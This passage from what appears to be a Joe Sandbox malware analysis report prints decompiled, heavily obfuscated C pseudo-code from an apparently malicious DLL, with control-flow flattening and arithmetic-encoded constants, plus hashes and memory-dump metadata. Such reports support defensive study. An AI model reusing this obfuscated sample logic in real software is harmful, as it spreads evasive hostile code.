                          				_t814 = 0x30e419;
                          				_v204 = 0x180842;
                          				_v204 = _v204 ^ 0x577ac785;
                          				_v204 = _v204 + 0x1256;
                          				_v204 = _v204 ^ 0x5761cb73;
                          				_v136 = 0xcc77c3;
                          				_v136 = _v136 | 0x2e5c8e9b;
                          				_t825 = 0x3c;
                          				_v12 = 0xc2dfee2;
                          				_v16 = 0x8d06406;
                          				_v136 = _v136 * 0x19;
                          				_v136 = _v136 ^ 0x93985978;
                          				_v144 = 0xcb98e2;
                          				_v144 = _v144 ^ 0x2e2af391;
                          				_v144 = _v144 + 0xffff95d2;
                          				_v144 = _v144 ^ 0x2ee989ff;
                          				_v152 = 0x6e8dcb;
                          				_v152 = _v152 * 0x64;
                          				_v152 = _v152 ^ 0xf6de88b0;
                          				_v152 = _v152 ^ 0xddf9340f;
                          				_v160 = 0x1f41c3;
                          				_v160 = _v160 / _t825;
                          				_v160 = _v160 ^ 0x710c49d1;
                          				_v160 = _v160 ^ 0x7106b0fc;
                          				_v164 = 0xea0060;
                          				_v164 = _v164 << 2;
                          				_t826 = 0x54;
                          				_v164 = _v164 * 0x51;
                          				_v164 = _v164 ^ 0x2820691f;
                          				_v212 = 0x1a562c;
                          				_v212 = _v212 + 0xffff6884;
                          				_v212 = _v212 / _t826;
                          				_v212 = _v212 ^ 0x000ca439;
                          				_v316 = 0xc049a;
                          				_t827 = 0x4a;
                          				_v316 = _v316 / _t827;
                          				_v316 = _v316 >> 0xd;
                          				_v316 = _v316 >> 0xc;
                          				_v316 = _v316 ^ 0x000978cf;
                          				_v120 = 0xbc159f;
                          				_t828 = 0x75;
                          				_v120 = _v120 * 0x6f;
                          				_t829 = 0x3acf932;
                          				_v120 = _v120 / _t828;
                          				_v120 = _v120 ^ 0x00bb77de;
                          				_v128 = 0x83c7e3;
                          				_v128 = _v128 ^ 0x1c1c3aef;
                          				_v128 = _v128 ^ 0x03a71d14;
                          				_v128 = _v128 ^ 0x1f3d9b10;
                          				while(1) {
                          					L1:
                          					while(1) {
                          						do {
                          							while(1) {
                          								L3:
                          								_t840 = _t740 - 0x6051746;
                          								if(_t840 <= 0) {
                          									break;
                          								}
                          								__eflags = _t740 - 0x644521d;
                          								if(_t740 == 0x644521d) {
                          									E00D512C1(_v32, _v136, _v144, _v152, _v160);
                          									_t740 = 0x4160ee8;
                          									goto L25;
                          								} else {
                          									__eflags = _t740 - 0x8d06406;
                          									if(_t740 == 0x8d06406) {
                          										_push(_t746);
                          										_push(_t746);
                          										_t715 = E00D3C5D8(_v20);
                          										_t746 = _v224;
                          										_t834 = _t834 + 0xc;
                          										__eflags = _t715;
                          										_v24 = _t715;
                          										_t798 = 0x26ffc0;
                          										_t740 =  !=  ? 0x26ffc0 : _t814;
                          										_t716 = 0x5dc2900;
                          										continue;
                          									} else {
                          										__eflags = _t740 - 0xa8b367c;
                          										if(__eflags == 0) {
                          											_t740 = 0x6051746;
                          											continue;
                          										} else {
                          											__eflags = _t740 - 0xc2dfee2;
                          											if(__eflags == 0) {
                          												_push(_v276);
                          												_push(_v236);
                          												_push(_v320);
                          												_t737 = E00D3F288(_v272, _v280, E00D4E1F8(0xd313f8, _v312, __eflags), _v288,  &_v8,  &_v20, _v296, 0xd313f8, _v304, _v28, _v92);
                          												_t834 = _t834 + 0x30;
                          												__eflags = _t737 - _v264;
                          												_t740 =  ==  ? _v16 : _t814;
                          												E00D4FECB(_t734, _v76, _v248, _v256, _v84);
                          												L16:
                          												_t829 = 0x3acf932;
                          												L25:
                          												_t746 = _v224;
                          												_t834 = _t834 + 0xc;
                          												_t798 = 0x26ffc0;
                          											}
                          											goto L26;
                          										}
                          									}
                          								}
                          								L29:
                          								return _t832;
                          							}
                          							if(_t840 == 0) {
                          								_push(_v228);
                          								_push(_v180);
                          								_push(_v80);
                          								_t717 = E00D4E1F8(0xd313a8, _v40, __eflags);
                          								_push(_v72);
                          								_push(_v52);
                          								_push(_v64);
                          								__eflags = E00D3738A(_v132, _t717, _v172, _v108,  &_v28, E00D4E1F8(0xd31318, _v112, __eflags), _v148) - _v220;
                          								_t740 =  ==  ? _v12 : 0x1841daf;
                          								E00D4FECB(_t717, _v100, _v200, _v208, _v284);
                          								_t834 = _t834 + 0x38;
                          								E00D4FECB(_t718, _v176, _v184, _v252, _v192);
                          								_t814 = 0x30e419;
                          								goto L16;
                          							} else {
                          								if(_t740 == _t798) {
                          									_t725 = E00D31BC9(_v260, _v28, _v300, _v124, _v20, _v188, _v244, _v156, _v24,  &_v32, _v48, _v88);
                          									_t834 = _t834 + 0x2c;
                          									__eflags = _t725 - _v292;
                          									_t746 = _v224;
                          									_t716 = 0x5dc2900;
                          									_t740 =  ==  ? 0x5dc2900 : 0x4160ee8;
                          									goto L3;
                          								} else {
                          									if(_t740 == _t814) {
                          										E00D3F7FE(_v120, _v28, _v128, _v232);
                          									} else {
                          										if(_t740 == _t829) {
                          											_t729 = E00D322C9(_v308, _v36, _v32, 0x20, _a20, _v140, _v204, _v268);
                          											_t834 = _t834 + 0x18;
                          											_t740 = 0x644521d;
                          											__eflags = _t729 - _v196;
                          											_t832 =  ==  ? 1 : _t832;
                          											goto L11;
                          										} else {
                          											if(_t740 == 0x4160ee8) {
                          												E00D52B09(_v164, _v24, _v212, _v316);
                          												_t740 = _t814;
                          												goto L11;
                          											} else {
                          												if(_t740 != _t716) {
                          													goto L26;
                          												} else {
                          													E00D4CBE9(_v216, _a12, _v56, _t746, _v104, _v44, _v116, _v32);
                          													_t834 = _t834 + 0x18;
                          													_t740 =  ==  ? _t829 : 0x644521d;
                          													L11:
                          													_t746 = _v224;
                          													goto L1;
                          												}
                          											}
                          										}
                          									}
                          								}
                          							}
                          							goto L29;
                          							L26:
                          							__eflags = _t740 - 0x1841daf;
                          						} while (__eflags != 0);
                          						goto L29;
                          					}
                          				}
                          			}
                          0x00d36045
                          0x00d36050
                          0x00d36063
                          0x00d36064
                          0x00d3606b
                          0x00d36076
                          0x00d36081
                          0x00d3608c
                          0x00d36097
                          0x00d360a4
                          0x00d360a8
                          0x00d360b0
                          0x00d360b5
                          0x00d360bd
                          0x00d360d0
                          0x00d360d7
                          0x00d360e2
                          0x00d360ed
                          0x00d36102
                          0x00d3610b
                          0x00d36116
                          0x00d3611b
                          0x00d36126
                          0x00d36131
                          0x00d3613c
                          0x00d36147
                          0x00d36152
                          0x00d36165
                          0x00d36168
                          0x00d36173
                          0x00d3617e
                          0x00d36185
                          0x00d36190
                          0x00d3619b
                          0x00d361a6
                          0x00d361b1
                          0x00d361bc
                          0x00d361cf
                          0x00d361d6
                          0x00d361e1
                          0x00d361ec
                          0x00d36202
                          0x00d36209
                          0x00d36214
                          0x00d3621f
                          0x00d3622a
                          0x00d3623a
                          0x00d3623d
                          0x00d36244
                          0x00d3624f
                          0x00d3625a
                          0x00d36270
                          0x00d36277
                          0x00d36282
                          0x00d3628e
                          0x00d36293
                          0x00d36299
                          0x00d3629e
                          0x00d362a3
                          0x00d362ab
                          0x00d362be
                          0x00d362bf
                          0x00d362cf
                          0x00d362d4
                          0x00d362db
                          0x00d362e6
                          0x00d362f1
                          0x00d362fc
                          0x00d36307
                          0x00d36312
                          0x00d36312
                          0x00d36317
                          0x00d3631c
                          0x00d3631c
                          0x00d3631c
                          0x00d3631c
                          0x00d36322
                          0x00000000
                          0x00000000
                          0x00d36578
                          0x00d3657e
                          0x00d366b2
                          0x00d366b7
                          0x00000000
                          0x00d36584
                          0x00d36584
                          0x00d3658a
                          0x00d3665a
                          0x00d3665b
                          0x00d36663
                          0x00d36668
                          0x00d3666f
                          0x00d36672
                          0x00d36674
                          0x00d3667d
                          0x00d36682
                          0x00d36685
                          0x00000000
                          0x00d36590
                          0x00d36590
                          0x00d36596
                          0x00d36637
                          0x00000000
                          0x00d3659c
                          0x00d3659c
                          0x00d365a2
                          0x00d365a8
                          0x00d365b1
                          0x00d365b5
                          0x00d365fb
                          0x00d36600
                          0x00d3660b
                          0x00d36616
                          0x00d3662d
                          0x00d3656e
                          0x00d3656e
                          0x00d366bc
                          0x00d366bc
                          0x00d366c3
                          0x00d366cb
                          0x00d366cb
                          0x00000000
                          0x00d365a2
                          0x00d36596
                          0x00d3658a
                          0x00d36700
                          0x00d3670a
                          0x00d3670a
                          0x00d36328
                          0x00d3648f
                          0x00d36498
                          0x00d3649f
                          0x00d364ad
                          0x00d364bc
                          0x00d364c3
                          0x00d364ca
                          0x00d3651c
                          0x00d36524
                          0x00d36541
                          0x00d36546
                          0x00d36564
                          0x00d36569
                          0x00000000
                          0x00d3632e
                          0x00d36330
                          0x00d36469
                          0x00d36470
                          0x00d3647c
                          0x00d3647e
                          0x00d36482
                          0x00d36487
                          0x00000000
                          0x00d36336
                          0x00d36338
                          0x00d366f7
                          0x00d3633e
                          0x00d36340
                          0x00d363fd
                          0x00d3640e
                          0x00d36411
                          0x00d36416
                          0x00d36418
                          0x00000000
                          0x00d36346
                          0x00d3634c
                          0x00d363c5
                          0x00d363cc
                          0x00000000
                          0x00d3634e
                          0x00d36350
                          0x00000000
                          0x00d36356
                          0x00d36388
                          0x00d3638f
                          0x00d363a0
                          0x00d363a3
                          0x00d363a3
                          0x00000000
                          0x00d363a3
                          0x00d36350
                          0x00d3634c
                          0x00d36340
                          0x00d36338
                          0x00d36330
                          0x00000000
                          0x00d366d0
                          0x00d366d0
                          0x00d366d0
                          0x00000000
                          0x00d366dc
                          0x00d36317

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (INK$2G$5 $Jm$NI5$P_W$W"j$`$tJP${4$W
                          • API String ID: 0-4122124823
                          • Opcode ID: 5b1ac6ccd012be82a1e3ecbed1080939e9af79e45e3b6fac75bfcb8b6f447048
                          • Instruction ID: 4f2ea24ea133001ecc649f6fd4034739cb34ce15d9f08469dc8fe63a64325d16
                          • Opcode Fuzzy Hash: 5b1ac6ccd012be82a1e3ecbed1080939e9af79e45e3b6fac75bfcb8b6f447048
                          • Instruction Fuzzy Hash: 5772FD715093809FD3B9CF65C98AB8FBBE1BBC4304F108A1DE2DA86260D7B18559CF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          control_flow_graph 786 d3d14c-d3d7fc 787 d3d807 786->787 788 d3d80c-d3d80e 787->788 789 d3d80f-d3d811 788->789 790 d3d817 789->790 791 d3d92e-d3d934 789->791 792 d3da79-d3da95 call d33046 790->792 793 d3d81d-d3d823 790->793 794 d3d93a-d3d940 791->794 795 d3da2d-d3da6a call d31a34 791->795 816 d3da98-d3daa9 792->816 796 d3d825-d3d82b 793->796 797 d3d89d-d3d913 call d47c4e 793->797 799 d3d946-d3d94c 794->799 800 d3d9fe-d3da21 call d4e8b6 794->800 808 d3da6b-d3da71 795->808 804 d3d87a-d3d886 796->804 805 d3d82d-d3d833 796->805 818 d3d919-d3d929 797->818 819 d3d85d-d3d85f 797->819 807 d3d952-d3d9f9 call d4e1f8 call d37078 call d3f96f call d4fecb 799->807 799->808 800->816 820 d3da23-d3da28 800->820 817 d3d88b-d3d88e 804->817 812 d3d861-d3d878 call d4b257 805->812 813 d3d835-d3d83b 805->813 807->787 808->789 815 d3da77 808->815 812->788 813->808 821 d3d841-d3d85a call d33046 813->821 815->816 824 d3d890-d3d898 817->824 825 d3d888 817->825 818->788 819->788 820->788 821->819 824->789 825->817
                          C-Code - Quality: 98%
                          			E00D3D14C() {
                          				char _v520;
                          				char _v1040;
                          				char _v1560;
                          				signed int _v1564;
                          				signed int _v1568;
                          				signed int _v1572;
                          				signed int _v1576;
                          				signed int _v1580;
                          				signed int _v1584;
                          				signed int _v1588;
                          				signed int _v1592;
                          				signed int _v1596;
                          				signed int _v1600;
                          				signed int _v1604;
                          				signed int _v1608;
                          				signed int _v1612;
                          				signed int _v1616;
                          				signed int _v1620;
                          				signed int _v1624;
                          				signed int _v1628;
                          				signed int _v1632;
                          				signed int _v1636;
                          				signed int _v1640;
                          				signed int _v1644;
                          				signed int _v1648;
                          				signed int _v1652;
                          				signed int _v1656;
                          				signed int _v1660;
                          				signed int _v1664;
                          				signed int _v1668;
                          				signed int _v1672;
                          				signed int _v1676;
                          				signed int _v1680;
                          				signed int _v1684;
                          				signed int _v1688;
                          				signed int _v1692;
                          				signed int _v1696;
                          				signed int _v1700;
                          				signed int _v1704;
                          				signed int _v1708;
                          				signed int _v1712;
                          				signed int _v1716;
                          				signed int _v1720;
                          				signed int _v1724;
                          				signed int _v1728;
                          				signed int _v1732;
                          				signed int _v1736;
                          				signed int _v1740;
                          				signed int _v1744;
                          				signed int _v1748;
                          				signed int _v1752;
                          				signed int _v1756;
                          				void* _t429;
                          				intOrPtr _t432;
                          				intOrPtr _t436;
                          				signed int _t440;
                          				void* _t441;
                          				void* _t459;
                          				signed int _t468;
                          				intOrPtr _t469;
                          				intOrPtr* _t470;
                          				signed int _t471;
                          				signed int _t472;
                          				signed int _t473;
                          				signed int _t476;
                          				signed int* _t477;
                          				void* _t480;
                          
                          				_t477 =  &_v1756;
                          				_v1600 = 0x9247ff;
                          				_t441 = 0xcb67425;
                          				_v1600 = _v1600 + 0x9ce;
                          				_v1600 = _v1600 ^ 0x009251e4;
                          				_v1720 = 0x31cc78;
                          				_v1720 = _v1720 ^ 0xe44f8b4e;
                          				_v1720 = _v1720 | 0xfbe7febf;
                          				_v1720 = _v1720 ^ 0xfff0ff80;
                          				_v1612 = 0x6730db;
                          				_v1612 = _v1612 << 0xe;
                          				_v1612 = _v1612 ^ 0xcc36c002;
                          				_v1668 = 0x7fe6a4;
                          				_v1668 = _v1668 + 0xffff1494;
                          				_v1668 = _v1668 ^ 0x091c946b;
                          				_v1668 = _v1668 ^ 0x09626f51;
                          				_v1756 = 0x73e886;
                          				_v1756 = _v1756 | 0xafbdbbdf;
                          				_v1756 = _v1756 + 0xfe30;
                          				_v1756 = _v1756 ^ 0xb000fa0f;
                          				_v1604 = 0x468da6;
                          				_v1604 = _v1604 + 0xffffc3ca;
                          				_v1604 = _v1604 ^ 0x00465160;
                          				_v1592 = 0xd4519;
                          				_v1592 = _v1592 + 0x934d;
                          				_v1592 = _v1592 ^ 0x0004ddfc;
                          				_v1640 = 0x8a1a75;
                          				_v1640 = _v1640 + 0x87da;
                          				_v1640 = _v1640 + 0xaa53;
                          				_v1640 = _v1640 ^ 0x008e8924;
                          				_v1648 = 0xe80c10;
                          				_v1648 = _v1648 ^ 0x90af551f;
                          				_v1648 = _v1648 + 0x6d6d;
                          				_v1648 = _v1648 ^ 0x90403b69;
                          				_v1712 = 0x809df1;
                          				_v1712 = _v1712 << 2;
                          				_v1712 = _v1712 << 7;
                          				_v1576 = _v1576 & 0x00000000;
                          				_v1712 = _v1712 * 0x69;
                          				_v1712 = _v1712 ^ 0x81832f4f;
                          				_v1656 = 0xe952a2;
                          				_v1656 = _v1656 | 0x54fcc54b;
                          				_v1656 = _v1656 + 0xffff1739;
                          				_v1656 = _v1656 ^ 0x54fad21b;
                          				_v1700 = 0xbcdb1b;
                          				_v1700 = _v1700 + 0xdccd;
                          				_v1700 = _v1700 + 0xffffcf6f;
                          				_v1700 = _v1700 ^ 0x00b72c28;
                          				_v1628 = 0x5c7dad;
                          				_v1628 = _v1628 >> 5;
                          				_v1628 = _v1628 + 0x3d87;
                          				_v1628 = _v1628 ^ 0x000cf9b2;
                          				_v1660 = 0x2281c9;
                          				_v1660 = _v1660 * 0x49;
                          				_v1660 = _v1660 >> 5;
                          				_v1660 = _v1660 ^ 0x004fb411;
                          				_v1568 = 0xcd133d;
                          				_v1568 = _v1568 * 0x4e;
                          				_v1568 = _v1568 ^ 0x3e7dd872;
                          				_v1672 = 0x86c6ca;
                          				_v1672 = _v1672 * 0x5f;
                          				_v1672 = _v1672 + 0xffff3952;
                          				_v1672 = _v1672 ^ 0x3200c70e;
                          				_v1588 = 0x24e2cc;
                          				_v1588 = _v1588 | 0xcf150453;
                          				_v1588 = _v1588 ^ 0xcf3ce5d0;
                          				_v1572 = 0x6249a8;
                          				_v1572 = _v1572 << 6;
                          				_v1572 = _v1572 ^ 0x189f8b0c;
                          				_v1596 = 0x119a44;
                          				_v1596 = _v1596 >> 8;
                          				_v1596 = _v1596 ^ 0x000b5fad;
                          				_v1680 = 0xd16cc2;
                          				_v1680 = _v1680 ^ 0x4916a611;
                          				_v1680 = _v1680 >> 0xe;
                          				_v1680 = _v1680 ^ 0x00055714;
                          				_v1728 = 0x441d3d;
                          				_t471 = 0x35;
                          				_v1728 = _v1728 * 3;
                          				_v1728 = _v1728 << 3;
                          				_v1728 = _v1728 | 0x559f2c94;
                          				_v1728 = _v1728 ^ 0x57fdad3a;
                          				_v1564 = 0xb1e813;
                          				_v1564 = _v1564 >> 0xc;
                          				_v1564 = _v1564 ^ 0x0004104c;
                          				_v1736 = 0x70197f;
                          				_v1736 = _v1736 >> 0x10;
                          				_v1736 = _v1736 + 0xe51d;
                          				_v1736 = _v1736 * 0x61;
                          				_v1736 = _v1736 ^ 0x00557f63;
                          				_v1744 = 0x5ff0e3;
                          				_v1744 = _v1744 + 0xffff2d97;
                          				_v1744 = _v1744 + 0xffff9c65;
                          				_v1744 = _v1744 ^ 0xd07f01de;
                          				_v1744 = _v1744 ^ 0xd026cc62;
                          				_v1608 = 0x914f5e;
                          				_v1608 = _v1608 << 0xf;
                          				_v1608 = _v1608 ^ 0xa7adba7a;
                          				_v1664 = 0xe3376f;
                          				_v1664 = _v1664 >> 8;
                          				_v1664 = _v1664 << 4;
                          				_v1664 = _v1664 ^ 0x000bcae6;
                          				_v1616 = 0x54b2fb;
                          				_v1616 = _v1616 + 0xce1d;
                          				_v1616 = _v1616 ^ 0x005b3b7b;
                          				_v1644 = 0xe2ce3f;
                          				_v1644 = _v1644 + 0x16f2;
                          				_v1644 = _v1644 >> 0xd;
                          				_v1644 = _v1644 ^ 0x000e1e70;
                          				_v1752 = 0x7f4aca;
                          				_v1752 = _v1752 ^ 0x883f1d9d;
                          				_v1752 = _v1752 + 0x59a5;
                          				_v1752 = _v1752 | 0x80ddc91b;
                          				_v1752 = _v1752 ^ 0x88d3833c;
                          				_v1636 = 0xc2c2cf;
                          				_v1636 = _v1636 / _t471;
                          				_v1636 = _v1636 + 0xffff5d17;
                          				_v1636 = _v1636 ^ 0x0005a2c5;
                          				_v1676 = 0x4604e2;
                          				_v1676 = _v1676 * 0x76;
                          				_v1676 = _v1676 + 0xdac5;
                          				_v1676 = _v1676 ^ 0x2048b942;
                          				_v1652 = 0x890d36;
                          				_v1652 = _v1652 >> 3;
                          				_v1652 = _v1652 | 0xfe9d52c1;
                          				_v1652 = _v1652 ^ 0xfe9ab4fb;
                          				_v1684 = 0xd96cde;
                          				_v1684 = _v1684 * 0x47;
                          				_v1684 = _v1684 + 0xffff480a;
                          				_v1684 = _v1684 ^ 0x3c48c040;
                          				_v1624 = 0xc48732;
                          				_v1624 = _v1624 >> 4;
                          				_v1624 = _v1624 ^ 0x01665cbd;
                          				_v1624 = _v1624 ^ 0x016df620;
                          				_v1692 = 0x58f5b8;
                          				_v1692 = _v1692 << 4;
                          				_v1692 = _v1692 ^ 0x299232ca;
                          				_v1692 = _v1692 ^ 0x2c1b7361;
                          				_v1732 = 0x9987b4;
                          				_v1732 = _v1732 << 4;
                          				_v1732 = _v1732 ^ 0x14505727;
                          				_v1732 = _v1732 | 0xbadb6758;
                          				_v1732 = _v1732 ^ 0xbfd57076;
                          				_v1708 = 0x151e5;
                          				_v1708 = _v1708 >> 0xd;
                          				_v1708 = _v1708 >> 0xe;
                          				_v1708 = _v1708 + 0xffff12c7;
                          				_v1708 = _v1708 ^ 0xffff0a0d;
                          				_v1580 = 0x15a9fb;
                          				_v1580 = _v1580 >> 6;
                          				_v1580 = _v1580 ^ 0x0004a695;
                          				_v1688 = 0x871746;
                          				_t472 = 0x34;
                          				_v1688 = _v1688 / _t472;
                          				_v1688 = _v1688 + 0xffff07ae;
                          				_v1688 = _v1688 ^ 0x00087c5e;
                          				_v1740 = 0xe3d16b;
                          				_v1740 = _v1740 << 7;
                          				_v1740 = _v1740 | 0x6cb9ee1d;
                          				_v1740 = _v1740 ^ 0x38143ac0;
                          				_v1740 = _v1740 ^ 0x45e6e926;
                          				_v1724 = 0xe03c47;
                          				_v1724 = _v1724 + 0x7497;
                          				_v1724 = _v1724 << 0xe;
                          				_v1724 = _v1724 + 0xffff69be;
                          				_v1724 = _v1724 ^ 0x2c306d9d;
                          				_v1748 = 0xe2efab;
                          				_v1748 = _v1748 | 0x110de103;
                          				_v1748 = _v1748 + 0x3577;
                          				_t473 = 0x2b;
                          				_t440 = _v1576;
                          				_v1748 = _v1748 / _t473;
                          				_v1748 = _v1748 ^ 0x006272f3;
                          				_v1716 = 0x295420;
                          				_v1716 = _v1716 ^ 0xaa3d2c48;
                          				_v1716 = _v1716 + 0xffff3248;
                          				_v1716 = _v1716 ^ 0xb95b2034;
                          				_v1716 = _v1716 ^ 0x134f16e6;
                          				_v1620 = 0x315b6e;
                          				_v1620 = _v1620 ^ 0xed866512;
                          				_v1620 = _v1620 ^ 0xedb02c8f;
                          				_v1696 = 0xb25998;
                          				_t476 = _v1576;
                          				_t468 = _v1576;
                          				_v1696 = _v1696 * 0xf;
                          				_v1696 = _v1696 << 9;
                          				_v1696 = _v1696 ^ 0xe675be87;
                          				_v1632 = 0x9ab851;
                          				_v1632 = _v1632 ^ 0x37be7fac;
                          				_v1632 = _v1632 + 0xffff726f;
                          				_v1632 = _v1632 ^ 0x372cadd5;
                          				_v1704 = 0xe98d3;
                          				_v1704 = _v1704 | 0xb808fc66;
                          				_v1704 = _v1704 ^ 0xb98541de;
                          				_v1704 = _v1704 | 0x92c26071;
                          				_v1704 = _v1704 ^ 0x93ce4092;
                          				_v1584 = 0x695255;
                          				_v1584 = _v1584 | 0x2c3ea780;
                          				_v1584 = _v1584 ^ 0x2c75cea7;
                          				while(1) {
                          					L1:
                          					while(1) {
                          						_t459 = 0x5c;
                          						do {
                          							while(1) {
                          								L3:
                          								_t480 = _t441 - 0xc1f8872;
                          								if(_t480 > 0) {
                          									break;
                          								}
                          								if(_t480 == 0) {
                          									E00D33046(_v1696, _v1632, _v1704, _t440, _v1584);
                          								} else {
                          									if(_t441 == 0x1770085) {
                          										_t476 = E00D47C4E(_t440, _t459, _t441, _v1644, _v1752, _v1668, _v1636, _v1676, _v1756, _v1652, _t468, _v1684, _v1604, _v1624, _t441, _v1692, _t441, _v1732, _t441, _t468, _v1708,  &_v1560, _v1580, _v1612);
                          										_t477 =  &(_t477[0x16]);
                          										__eflags = _t476;
                          										if(_t476 == 0) {
                          											goto L10;
                          										} else {
                          											_t441 = 0x650cb13;
                          											_v1576 = 1;
                          											while(1) {
                          												_t459 = 0x5c;
                          												goto L3;
                          											}
                          										}
                          									} else {
                          										if(_t441 == 0x30ba806) {
                          											_t469 =  *0xd56214; // 0x0
                          											_t470 = _t469 + 0x23c;
                          											while(1) {
                          												__eflags =  *_t470 - _t459;
                          												if( *_t470 == _t459) {
                          													break;
                          												}
                          												_t470 = _t470 + 2;
                          												__eflags = _t470;
                          											}
                          											_t468 = _t470 + 2;
                          											_t441 = 0xd1695f5;
                          											continue;
                          										} else {
                          											if(_t441 == 0x650cb13) {
                          												E00D4B257(_t440, _v1688, _v1740, _t476);
                          												_t441 = 0x8b9ab05;
                          												while(1) {
                          													_t459 = 0x5c;
                          													goto L3;
                          												}
                          											} else {
                          												if(_t441 != 0x8b9ab05) {
                          													goto L25;
                          												} else {
                          													_t352 =  &_v1748; // 0x45e6e926
                          													E00D33046(_v1724,  *_t352, _v1716, _t476, _v1620);
                          													_t477 =  &(_t477[3]);
                          													L10:
                          													_t441 = 0xc1f8872;
                          													while(1) {
                          														_t459 = 0x5c;
                          														goto L3;
                          													}
                          												}
                          											}
                          										}
                          									}
                          								}
                          								L28:
                          								return _v1576;
                          							}
                          							__eflags = _t441 - 0xcb67425;
                          							if(_t441 == 0xcb67425) {
                          								E00D31A34(_v1592,  &_v520, _t441, _t441, _v1640, _v1648, _v1712, _t441, _v1600, _v1656);
                          								_t477 =  &(_t477[8]);
                          								_t441 = 0xd521465;
                          								_t459 = 0x5c;
                          								goto L25;
                          							} else {
                          								__eflags = _t441 - 0xd1695f5;
                          								if(_t441 == 0xd1695f5) {
                          									_t440 = E00D4E8B6(_t441, _v1608, _v1664, _t441, _v1720, _v1616);
                          									_t477 =  &(_t477[4]);
                          									__eflags = _t440;
                          									if(_t440 != 0) {
                          										_t441 = 0x1770085;
                          										_t459 = 0x5c;
                          										goto L3;
                          									}
                          								} else {
                          									__eflags = _t441 - 0xd521465;
                          									if(__eflags != 0) {
                          										goto L25;
                          									} else {
                          										_push(_v1568);
                          										_push(_v1660);
                          										_push(_v1628);
                          										_t429 = E00D4E1F8(0xd31030, _v1700, __eflags);
                          										E00D37078( &_v1040, __eflags);
                          										_t432 =  *0xd56214; // 0x0
                          										_t436 =  *0xd56214; // 0x0
                          										E00D3F96F(_v1672, __eflags, _t436 + 0x34, _t429,  &_v1040, _v1588,  &_v1560, _t432 + 0x23c, _v1572, _v1596, _v1680,  &_v520);
                          										E00D4FECB(_t429, _v1728, _v1564, _v1736, _v1744);
                          										_t477 =  &(_t477[0x10]);
                          										_t441 = 0x30ba806;
                          										goto L1;
                          									}
                          								}
                          							}
                          							goto L28;
                          							L25:
                          							__eflags = _t441 - 0x3fe9fd3;
                          						} while (_t441 != 0x3fe9fd3);
                          						goto L28;
                          					}
                          				}
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: T)$&E$G<$Qob$URi$`QF$mm$n[1$o7$w5${;[
                          • API String ID: 0-1763375246
                          • Opcode ID: 99624e17141cf2f6e2d5efe450fcf8b9a434da4fd319386ff83a97c88229658e
                          • Instruction ID: e9f7dcd387dd7cafa70d095e7141b424ce98fb32d684f498e107ffdfd0111934
                          • Opcode Fuzzy Hash: 99624e17141cf2f6e2d5efe450fcf8b9a434da4fd319386ff83a97c88229658e
                          • Instruction Fuzzy Hash: 5A2212714093809FD3B9CF61C94AA9BBBE1FBC5708F10891DE2DA96260D7B18949CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          [Figure: control-flow graph of function d45779, blocks marked Executed / Not Executed]
                          C-Code - Quality: 92%
                          			E00D45779(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                          				char _v32;
                          				void* _v44;
                          				intOrPtr _v48;
                          				intOrPtr _v60;
                          				intOrPtr _v64;
                          				intOrPtr _v68;
                          				intOrPtr _v88;
                          				char _v92;
                          				char _v100;
                          				intOrPtr _v104;
                          				signed int _v108;
                          				intOrPtr _v112;
                          				char _v116;
                          				signed int _v120;
                          				signed int _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				signed int _v140;
                          				signed int _v144;
                          				signed int _v148;
                          				signed int _v152;
                          				signed int _v156;
                          				unsigned int _v160;
                          				signed int _v164;
                          				signed int _v168;
                          				signed int _v172;
                          				unsigned int _v176;
                          				signed int _v180;
                          				signed int _v184;
                          				unsigned int _v188;
                          				signed int _v192;
                          				signed int _v196;
                          				signed int _v200;
                          				signed int _v204;
                          				signed int _v208;
                          				unsigned int _v212;
                          				signed int _v216;
                          				signed int _v220;
                          				signed int _v224;
                          				signed int _v228;
                          				signed int _v232;
                          				signed int _v236;
                          				signed int _v240;
                          				signed int _v244;
                          				signed int _v248;
                          				unsigned int _v252;
                          				signed int _v256;
                          				signed int _v260;
                          				signed int _v264;
                          				signed int _v268;
                          				signed int _v272;
                          				signed int _v276;
                          				signed int _v280;
                          				signed int _v284;
                          				signed int _v288;
                          				void* _t410;
                          				void* _t455;
                          				void* _t464;
                          				intOrPtr _t469;
                          				void* _t475;
                          				intOrPtr* _t477;
                          				void* _t479;
                          				signed int _t492;
                          				signed char* _t519;
                          				signed int _t522;
                          				signed int _t523;
                          				signed int _t524;
                          				signed int _t525;
                          				signed int _t526;
                          				signed int _t527;
                          				signed int _t528;
                          				signed int _t529;
                          				signed int _t530;
                          				signed int _t531;
                          				signed char* _t532;
                          				intOrPtr _t533;
                          				intOrPtr _t534;
                          				void* _t535;
                          				signed char* _t536;
                          				intOrPtr* _t537;
                          				signed int* _t539;
                          				signed int* _t541;
                          				void* _t543;
                          
                          				_t477 = _a12;
                          				_push(_t477);
                          				_push(_a8);
                          				_t533 = __edx;
                          				_t537 = __ecx;
                          				_push(_a4);
                          				_v104 = __edx;
                          				_push(__edx);
                          				_push(__ecx);
                          				E00D4FE29(_t410);
                          				_v48 = 0xc2c967;
                          				_v108 = _v108 & 0x00000000;
                          				asm("stosd");
                          				_t539 =  &(( &_v288)[5]);
                          				_t479 = 0x2d8a01e;
                          				asm("stosd");
                          				asm("stosd");
                          				_v268 = 0x13192e;
                          				_v268 = _v268 >> 0xe;
                          				_t522 = 0x7a;
                          				_v268 = _v268 / _t522;
